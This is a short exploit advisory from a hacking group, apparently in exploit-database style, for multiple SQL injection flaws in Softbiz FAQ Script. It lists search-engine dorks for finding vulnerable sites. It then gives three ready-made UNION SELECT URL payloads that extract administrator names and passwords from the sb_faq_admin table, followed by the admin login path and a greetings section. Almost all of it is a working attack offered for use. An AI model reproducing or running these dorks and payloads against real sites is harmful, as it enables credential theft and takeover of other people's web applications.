|___________________________________________________|
|
| Softbiz FAQ Script Multiple SQL Injection Vulnerability
|
|___________________________________________________
|--------------------IQ-Security--------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-TY.CoM  |  wWw.TrYaG.cC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.softbizscripts.com
|
| DorK : inurl:"faq_qanda.php?id="
| DorK : inurl:"index.php?cid="
| DorK : inurl: "print_article.php?id="
|___________________________________________________|


Exploit:
________



www.[target].com/Script/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--


2

www.[target].com/Script/index.php?cid=-1+union+select+null,concat_ws(0x3a,adminname,adminpwd),null,null+from+sb_faq_admin--

3


www.[target].com/Script/print_article.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--




Login :

www.[target].com/Script/admin/




____________________________( Greetz )_________________________________
|
|          IQ-Security > WwW.IQ-TY.CoM   |  wWw.TrYaG.cC
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi